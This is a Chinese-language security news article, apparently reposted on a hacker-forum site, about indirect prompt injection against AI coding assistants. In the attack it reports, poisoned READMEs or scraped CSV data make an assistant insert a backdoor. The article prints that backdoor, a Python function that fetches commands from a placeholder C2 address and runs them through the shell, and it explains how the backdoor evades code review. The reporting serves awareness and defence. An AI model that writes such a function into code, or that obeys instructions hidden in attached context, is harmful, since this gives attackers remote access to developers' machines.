威胁行为者可能会滥用代码助手来植入后门和生成有害内容

威胁行为者可能会滥用代码助手来植入后门和生成有害内容

现代开发工作流越来越依赖人工智能驱动的编码助手来加快软件交付速度并提高代码质量。

然而,近期的研究揭示了一种潜在的新威胁:攻击者可以利用这些工具植入后门,并生成有害内容,且不会被立即发现。

这种漏洞通过对上下文附加功能的滥用体现出来,受污染的外部数据源会将恶意提示直接注入编码助手的工作流程中。

因此,开发人员可能会在无意中将隐藏的有效载荷整合到他们的代码库中,从而破坏安全性和信任。

当威胁者通过植入类似合法代码注释或元数据的有效载荷指令来危害公共代码库、文档网站或被抓取的数据源时,攻击面就会扩大。

当这些受污染的来源作为上下文附加在IDE插件中或通过远程URL添加时,编码助手会将这些恶意代码片段视为开发者请求的一部分。

帕洛阿尔托网络公司的研究人员发现,这种间接提示注入载体是一个严重的漏洞,它可以绕过标准的内容审核过滤器和代码审查防护措施。

在一个模拟场景中,一组作为CSV输入提供的抓取的社交媒体帖子触发了助手生成包含隐藏后门的代码。

这个名为fetch_additional_data的恶意函数,以补充分析为幌子,连接到攻击者控制的C2服务器,并执行返回的命令。

当开发者接受生成的建议时,隐藏的程序会自动执行,从而获得未授权的远程访问权限。

这种攻击手法的简单性在于,助手无法区分用户的本意指令和那些秘密嵌入外部数据中的指令。

威胁行为者可能会滥用代码助手来植入后门和生成有害内容

这个由被劫持的助手植入的后门函数,是从远程的C2服务器获取的。在实际操作中,注入的代码与合法的工作流程无缝融合,躲过了常规检查。

习惯信赖人工智能生成建议的开发者可能会忽略函数签名或注释中的细微差异。

更让风险加剧的是,代码助手支持多种编程语言,这意味着攻击者无需为特定环境定制有效载荷——助手会根据项目的语言环境调整后门程序。

感染机制策略

感染机制始于威胁行为者在公共数据源(如GitHub的README文件或公开索引的CSV文件)中植入指令,这些指令被伪装成合法的代码注释。

摄入后,助手会将内容解析到其提示管道中,并在用户查询前附加恶意指令。

这种植入方式确保后门代码看起来像是开发者需求的自然延伸。一旦助手生成组合输出,隐藏的程序就会在代码被应用时立即在开发者的机器上执行。

def fetch_additional_data():
    import requests, subprocess
    url = "http://192.0.2.1/c2"
    resp = requests.get(url)
    if resp.status_code == 200:
        cmd = resp.text
        subprocess.call(cmd, shell=True)

威胁行为者可能会滥用代码助手来植入后门和生成有害内容

规避检测源于后门程序的极小痕迹:除了标准的HTTP请求外,没有外部库,使用通用的函数名和经过混淆的命令与控制(C2)URL。

通过将该程序嵌入到常规的分析功能中,这种攻击手段得以在人工或自动代码审查过程中不触发警报。

随着人工智能工具变得更加自主,这一方向将需要严格的上下文验证和严格的执行控制,以防止未被发现的危害。

版权声明·<<<---红客联盟--->>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
安全威胁

LG WebOS电视漏洞允许攻击者绕过身份验证并实现设备完全接管

2025-9-20 12:47:10

安全威胁

RevengeHotels利用人工智能通过VenomRAT攻击Windows用户

2025-9-20 20:34:05

搜索